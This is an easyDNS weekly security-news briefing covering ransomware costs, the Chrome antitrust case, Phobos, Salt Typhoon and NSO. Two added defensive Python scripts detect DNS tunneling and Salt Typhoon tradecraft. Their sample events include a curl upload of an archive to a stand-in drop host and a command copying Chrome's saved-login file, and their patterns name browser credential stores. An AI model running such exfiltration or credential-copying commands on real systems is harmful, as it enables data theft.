#AxisOfEasy 377: The Rising Cost Of Ransomware Payouts Predicted To Reach 113 Million


Weekly Axis Of Easy #377


Last Week’s Quote was: “Without passion, you don’t have energy; without energy, you have nothing.” It was by Donald Trump. No one got it. Correction on the Ronald Reagan quote from AoE 375 … we did in fact have a winner. Ross got that one! Congrats.

This Week’s Quote: “Guilt: the gift that keeps on giving.” By ???

THE RULES: No searching up the answer, must be posted at the bottom of the blog post, in the comments section.

The Prize: First person to post the correct answer gets their next domain or hosting renewal on us.


This is your easyDNS #AxisOfEasy Briefing for the week of November 18th, 2024, in which our Technology Correspondent Joann L Barnes and easyCEO Mark E. Jeftovic send out a short briefing on the state of the ‘net and how it affects your business, security and privacy.

To listen to or watch this podcast edition, with commentary and insight from Joey Tweets and Len the Legend, click here.


In this issue: 

  • The Rising Cost of Ransomware Payouts Predicted to Reach 113 Million
  • Justice Department Targets Google Chrome in Landmark Antitrust Case
  • International Justice Brings Phobos Ransomware Mastermind to Trial
  • T-Mobile and Telecom Giants Targeted in Sophisticated Chinese Cyber Attack
  • WhatsApp Accuses NSO of Direct Role in Spyware Operations

Elsewhere Online:

  • Water Barghest: The Five-Year Cybercrime Operation Exploiting IoT Devices for Profit
  • Cybersecurity Crisis Looms Over US Drinking Water Infrastructure
  • Ubuntu Security Flaws Leave Systems Open to Attack
  • Palo Alto Addresses Zero-Day Flaws Used in Operation Lunar Peek
  • Senator highlights deadline for TikTok divestment under US law

 

The Rising Cost of Ransomware Payouts Predicted to Reach 113 Million

Ransomware attacks are escalating, with payouts projected to surpass $113 million in 2024. LockBit, responsible for 44% of global ransomware incidents from January to September 2023, has emerged as a dominant player, demanding millions in ransoms. U.S. banks reported $1.2 billion in ransomware-related payments in 2021, while healthcare remains especially vulnerable, suffering 33 breaches in August 2023 alone, affecting 673,934 individuals. Notable incidents include the Pacific Alliance Medical Center’s breach, compromising data on 266,133 patients, and CNA Financial’s $40 million payout in 2021. Average recovery costs for healthcare breaches hit $10.1 million per incident.

Ransom demands continue to rise; the 2023 average reached $4 million, with peaks of $35 million. Smaller organizations are disproportionately targeted, with over 75% of attacks hitting firms with under 1,000 employees. The FBI logged 3,729 ransomware complaints in 2021, causing $49.2 million in losses. These attacks frequently abuse DNS, which the article reports is used as a vector in 91% of cyberattacks.

Despite the rising threat, only 10% of large companies are expected to have adopted zero-trust security frameworks by 2026. To combat ransomware, organizations must deploy multi-layered defenses, train employees, segment networks, and prioritize DNS-layer security. Taken together, the figures above show how bold and sophisticated cybercriminal operations have become.
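One concrete piece of the "DNS-layer security" recommended above is watching resolver logs for the query patterns that ransomware crews use to tunnel data out or reach command-and-control over DNS. The script below is an added example written for this briefing; it is not code from easyDNS or from the linked article. The log format (one query per line: timestamp, client IP, query type, query name), the sample lines and the detection thresholds are all constructed for illustration.

```python
"""Flag DNS query patterns that often accompany ransomware staging and exfiltration.

Added example for this briefing; not code from easyDNS or the linked article.
Log format is constructed: "<timestamp> <client_ip> <qtype> <qname>", one query per line.
"""
import math
import re
from collections import Counter, defaultdict

# Constructed sample log: one client browsing normally, one client pushing data
# out through long, high-entropy TXT queries under a single attacker-controlled zone.
SAMPLE_LOG = """\
2024-11-18T09:00:01 10.0.0.5 A www.example.com
2024-11-18T09:00:02 10.0.0.5 AAAA mail.example.com
2024-11-18T09:00:03 10.0.0.5 A cdn.example.net
2024-11-18T09:00:04 10.0.0.9 TXT 6a7b3c9d2e1f4a5b6c7d8e9f0a1b2c3d.exfil-example.test
2024-11-18T09:00:04 10.0.0.9 TXT 9f8e7d6c5b4a3f2e1d0c9b8a7f6e5d4c.exfil-example.test
2024-11-18T09:00:05 10.0.0.9 TXT 0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d.exfil-example.test
2024-11-18T09:00:05 10.0.0.9 TXT f1e2d3c4b5a6978877665544332211aa.exfil-example.test
2024-11-18T09:00:06 10.0.0.9 TXT 5d4c3b2a1f0e9d8c7b6a594837261504.exfil-example.test
2024-11-18T09:00:06 10.0.0.9 TXT bbaa99887766554433221100ffeeddcc.exfil-example.test
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")


def shannon_entropy(s: str) -> float:
    """Bits per character; hex/base32 payload labels score well above ordinary hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    """Crude 'last two labels' approximation of the registered domain.
    A real deployment should use the Public Suffix List (think .co.uk)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname.lower()


def parse_log(text: str):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def analyze(text: str, label_len=24, entropy_bits=3.5, min_unique=5, txt_ratio=0.5) -> dict:
    """Return {registered_domain: {"clients": [...], "reasons": [...]}} for suspicious zones.

    Thresholds are assumptions for the example; tune them against your own baseline.
    """
    per_domain = defaultdict(lambda: {"subdomains": set(), "clients": set(), "qtypes": Counter()})
    for q in parse_log(text):
        entry = per_domain[registered_domain(q["qname"])]
        entry["subdomains"].add(q["qname"].split(".")[0])   # leftmost label carries the payload
        entry["clients"].add(q["client"])
        entry["qtypes"][q["qtype"]] += 1

    findings = {}
    for dom, e in per_domain.items():
        reasons = []
        payload_like = [s for s in e["subdomains"]
                        if len(s) >= label_len and shannon_entropy(s) >= entropy_bits]
        if payload_like:
            reasons.append(f"{len(payload_like)} long high-entropy labels")
        if len(e["subdomains"]) >= min_unique:
            reasons.append(f"{len(e['subdomains'])} unique subdomains")
        total = sum(e["qtypes"].values())
        if total and e["qtypes"]["TXT"] / total >= txt_ratio:
            reasons.append(f"TXT is {e['qtypes']['TXT']}/{total} of queries")
        if reasons:
            findings[dom] = {"clients": sorted(e["clients"]), "reasons": reasons}
    return findings


if __name__ == "__main__":
    for dom, info in analyze(SAMPLE_LOG).items():
        print(dom, info["clients"], "; ".join(info["reasons"]))
```

Run against the constructed log, only exfil-example.test is reported, with all three reasons and client 10.0.0.9. On a real resolver the same three signals (payload-sized labels, many never-seen subdomains under one zone, and an abnormal TXT share) are what DNS-tunneling tools leave behind; the registered-domain helper should be swapped for a Public Suffix List lookup before relying on it.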

Read: https://domainsure.com/articles/avoid-paying-hackers-ransomware-payouts-could-triple-last-years-total-to-over-113m-in-2024/

 

Justice Department Targets Google Chrome in Landmark Antitrust Case

The Justice Department, alongside several states, is escalating antitrust actions against Google, proposing the divestiture of its Chrome browser following Judge Amit Mehta’s August ruling that Google unlawfully monopolized the search market. Chrome, controlling 61% of the U.S. browser market, is pivotal to Google’s dominance, enabling extensive user data collection that drives its advertising revenue. Chrome also integrates with Gemini, Google’s AI product, steering users toward its web assistant capabilities and cementing its ecosystem.

The department seeks broader remedies targeting Google’s artificial intelligence initiatives and the Android operating system. While officials considered requiring Google to sell Android, they rejected this as overly severe. Instead, they propose licensing Google’s search data and results to competitors and granting websites greater control to shield content from Google’s AI exploitation. These proposals aim to dismantle barriers to competition and will be presented to Judge Mehta on Wednesday.

This case, initiated under the Trump administration and sustained by the Biden administration, is the most aggressive antitrust challenge since the Microsoft case two decades ago. Over recent months, government attorneys consulted numerous companies to refine their recommendations. A forced Chrome divestiture, however, hinges on identifying a suitable buyer, complicating the enforcement of these landmark measures.

Read: https://reclaimthenet.org/justice-department-google-chrome-antitrust-sell

 

International Justice Brings Phobos Ransomware Mastermind to Trial

The U.S. has extradited Evgenii Ptitsyn, a 42-year-old Russian, from South Korea to face charges in Maryland for his alleged role as a key administrator of the Phobos ransomware operation. Since joining Phobos in 2020, Ptitsyn is accused of orchestrating its sale, distribution, and use, enabling affiliates to extort over $16 million globally. Phobos ransomware was distributed via cybercrime forums and advertised for free, but affiliates paid about $300 for each decryption key needed to unlock a victim’s encrypted files. Evidence includes cryptocurrency transactions tied to Ptitsyn’s wallet.

Victims included a Maryland-based accounting firm serving federal agencies, Maryland healthcare providers, a New York law enforcement union, an Illinois contractor for the U.S. Departments of Defense and Energy, and a North Carolina children’s hospital. Ransom demands ranged from $12,000 to $300,000, with one Maryland healthcare provider paying $2,300 for a decryption key. Phobos’s impact extends beyond Ptitsyn, as other cybercrime groups such as 8Base have used variants of it.

Ptitsyn faces charges including wire fraud, conspiracy, computer fraud, and extortion, carrying potential decades-long prison sentences. His extradition highlights global law enforcement collaboration, with agencies from South Korea, Japan, Europe, and the U.S. working together. His November 4 court appearance in Maryland marks a pivotal moment in international cybercrime prosecution.

Read: https://techcrunch.com/2024/11/19/us-extradites-russian-accused-of-extorting-millions-in-phobos-ransomware-payments/

 

T-Mobile and Telecom Giants Targeted in Sophisticated Chinese Cyber Attack

T-Mobile confirmed it was targeted by Salt Typhoon, a Chinese cyberespionage group also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, in a months-long campaign to harvest sensitive cellphone communications from high-value intelligence targets. Joining AT&T, Verizon, and Lumen Technologies in the crosshairs, T-Mobile stated there was no significant impact on its systems or evidence of customer data breaches. This attack is part of a broader campaign linked to PRC-affiliated actors, who, according to U.S. government reports, infiltrated telecom networks to steal call records, compromise communications involving political and governmental figures, and access sensitive law enforcement data.

Salt Typhoon, active since 2020, has targeted entities across the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. The group exploits vulnerabilities in internet-facing services, then uses tools like Cobalt Strike, TrillClient, SparrowDoor variants, and bespoke malware to achieve persistence. Methods include lateral movement with PsExec, credential theft from web browsers, and exfiltration using anonymized file-sharing services and cURL. The group also repurposed proxy servers to disguise traffic to its command-and-control servers.

Trend Micro highlights their advanced, adaptable tradecraft, including the use of Microsoft Exchange exploits to deploy tools like China Chopper and Zingdoor. Salt Typhoon’s campaigns underscore the evolving threat of state-backed infiltration targeting critical infrastructure globally.
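The tradecraft listed above (PsExec for lateral movement, browser credential theft, cURL uploads to file-sharing services) leaves recognisable traces in endpoint telemetry. The hunt below is an added example written for this briefing, not code from Trend Micro, T-Mobile or the cited article. The event records are constructed JSON lines carrying the fields of a Sysmon process-creation event (EID 1) and a System-log service-install event (EID 7045); the upload allowlist and the account and host names are assumptions for the example.

```python
"""Hunt for the Salt Typhoon tradecraft described above in Windows endpoint telemetry.

Added example for this briefing; not code from Trend Micro, T-Mobile or the cited article.
Input is constructed JSON lines shaped like Sysmon EID 1 (process creation) and
System-log EID 7045 (service installed) events.
"""
import json
import re
from urllib.parse import urlparse

# Hosts where curl uploads are legitimate; anything else is flagged. Assumed for the example.
UPLOAD_ALLOWLIST = {"artifacts.corp.example"}

# Browser credential stores; a shell copying these is the "credential theft via browsers" step.
BROWSER_CRED_FILES = ("\\login data", "\\logins.json", "\\key4.db")

# curl options that send a local file or form body. Case-sensitive on purpose: -f and -t mean other things.
UPLOAD_FLAG_RE = re.compile(r"(?:^|\s)(?:-F|--form|-T|--upload-file|--data-binary\s+@|-d\s+@)")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

SAMPLE_EVENTS = r"""
{"event_id": 7045, "host": "WS-22", "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe", "account": "CORP\\svc-backup"}
{"event_id": 7045, "host": "WS-22", "service_name": "gupdate", "image_path": "C:\\Program Files\\Google\\Update\\GoogleUpdate.exe /svc", "account": "SYSTEM"}
{"event_id": 1, "host": "WS-22", "image": "C:\\Windows\\System32\\curl.exe", "command_line": "curl.exe -s -F \"file=@C:\\Users\\Public\\cdr.7z\" https://files.example-drop.test/up", "account": "CORP\\svc-backup"}
{"event_id": 1, "host": "WS-22", "image": "C:\\Windows\\System32\\curl.exe", "command_line": "curl.exe -T build.zip https://artifacts.corp.example/", "account": "CORP\\jdoe"}
{"event_id": 1, "host": "WS-22", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c copy \"C:\\Users\\jdoe\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\" C:\\Users\\Public\\ld.db", "account": "CORP\\svc-backup"}
"""


def parse_events(text):
    """Yield one dict per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def check_psexec(ev):
    """PsExec registers a service named PSEXESVC (binary PSEXESVC.exe) on the target host."""
    if ev.get("event_id") != 7045:
        return None
    name = ev.get("service_name", "").lower()
    path = ev.get("image_path", "").lower()
    if name == "psexesvc" or "psexesvc.exe" in path:
        return "PsExec service installed (lateral movement)"
    return None


def check_curl_upload(ev):
    """curl sending a file or form body to a host outside the upload allowlist."""
    if ev.get("event_id") != 1 or not ev.get("image", "").lower().endswith("curl.exe"):
        return None
    cmd = ev.get("command_line", "")
    if not UPLOAD_FLAG_RE.search(cmd):
        return None
    hosts = {urlparse(u).hostname for u in URL_RE.findall(cmd)}
    bad = sorted(h for h in hosts if h and h.lower() not in UPLOAD_ALLOWLIST)
    return f"curl upload to non-allowlisted host: {', '.join(bad)}" if bad else None


def check_browser_creds(ev):
    """Command line touching a browser credential store (Chrome 'Login Data', Firefox logins.json / key4.db)."""
    if ev.get("event_id") != 1:
        return None
    cmd = ev.get("command_line", "").lower()
    if any(f in cmd for f in BROWSER_CRED_FILES):
        return "browser credential store accessed from a shell"
    return None


CHECKS = (check_psexec, check_curl_upload, check_browser_creds)


def hunt(text):
    """Return (host, account, reason) for every matching event, in log order."""
    findings = []
    for ev in parse_events(text):
        for check in CHECKS:
            reason = check(ev)
            if reason:
                findings.append((ev.get("host"), ev.get("account"), reason))
    return findings


def accounts_with_multiple_stages(findings, minimum=2):
    """Accounts tied to several distinct stages: a far stronger signal than any single hit."""
    stages = {}
    for _, account, reason in findings:
        stages.setdefault(account, set()).add(reason.split(":")[0].split(" (")[0])
    return sorted(a for a, s in stages.items() if len(s) >= minimum)


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for host, account, reason in results:
        print(f"{host}\t{account}\t{reason}")
    print("pivot on:", accounts_with_multiple_stages(results))
```

On the constructed events the PsExec install, the cURL upload to files.example-drop.test and the copy of Chrome’s Login Data are each flagged, while the Google updater service and the upload to the allowlisted artifacts host are not; all three hits share the account CORP\svc-backup, which is the pivot a responder would chase first. Each check alone produces false positives (admins use PsExec and curl too), so the correlation step matters more than any single rule.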

Read: https://thehackernews.com/2024/11/chinese-hackers-exploit-t-mobile-and.html

 

WhatsApp Accuses NSO of Direct Role in Spyware Operations

The Israeli NSO Group faces intense scrutiny over its Pegasus spyware, accused of targeting journalists, activists, and dissidents via unauthorized WhatsApp access. WhatsApp’s 2019 lawsuit revealed Pegasus was distributed to 1,400 devices using WhatsApp servers. New filings allege NSO directly installed and operated Pegasus, leaving clients with minimal involvement: entering a phone number and awaiting installation. WhatsApp claims NSO monitored misuse, even disconnecting ten clients for excessive abuse, contradicting NSO’s insistence that customers solely operate the spyware.

NSO allegedly compromised WhatsApp with exploits code-named Heaven, Eden, and Erised to infiltrate devices. Even after WhatsApp’s lawsuit and countermeasures, NSO allegedly persisted, bypassing blocks and developing new tools to distribute Pegasus. The spyware’s capabilities, stealthily extracting messages, passwords, and location data, fuel its use by authoritarian regimes, raising ethical concerns despite NSO’s claim of exclusively serving legitimate government purposes.

A 2021 database leak exposed Pegasus’s use against 50,000 targets, leading to the US blacklisting NSO and severely curtailing its operations. The case reflects a burgeoning spyware market, with NSO and similar vendors responsible for nearly half of all zero-day exploits since 2014, per Google. Broader industry concerns include Apple’s move to drop the lawsuit it filed against NSO in 2021, to avoid revealing sensitive counter-surveillance methods in court. The litigation encapsulates spyware’s ethical and legal challenges.

Read: https://www.darkreading.com/endpoint-security/whatsapp-nso-group-operates-pegasus-spyware


Elsewhere Online:


Water Barghest: The Five-Year Cybercrime Operation Exploiting IoT Devices for Profit
Read: https://www.darkreading.com/cloud-security/water-barghest-sells-hijacked-iot-devices-proxy-botnet-misuse

Cybersecurity Crisis Looms Over US Drinking Water Infrastructure
Read: https://hackread.com/cybersecurity-flaws-us-drinking-water-systems-risks/

Ubuntu Security Flaws Leave Systems Open to Attack
Read: https://www.infosecurity-magazine.com/news/5-privilege-escalation-flaws/

Palo Alto Addresses Zero-Day Flaws Used in Operation Lunar Peek
Read: https://www.securityweek.com/palo-alto-patches-firewall-zero-day-exploited-in-operation-lunar-peek/

Senator highlights deadline for TikTok divestment under US law
Read: https://www.reuters.com/world/us/senator-says-trump-cannot-ignore-law-requiring-bytedance-divest-tiktok-by-next-2024-11-19/

 
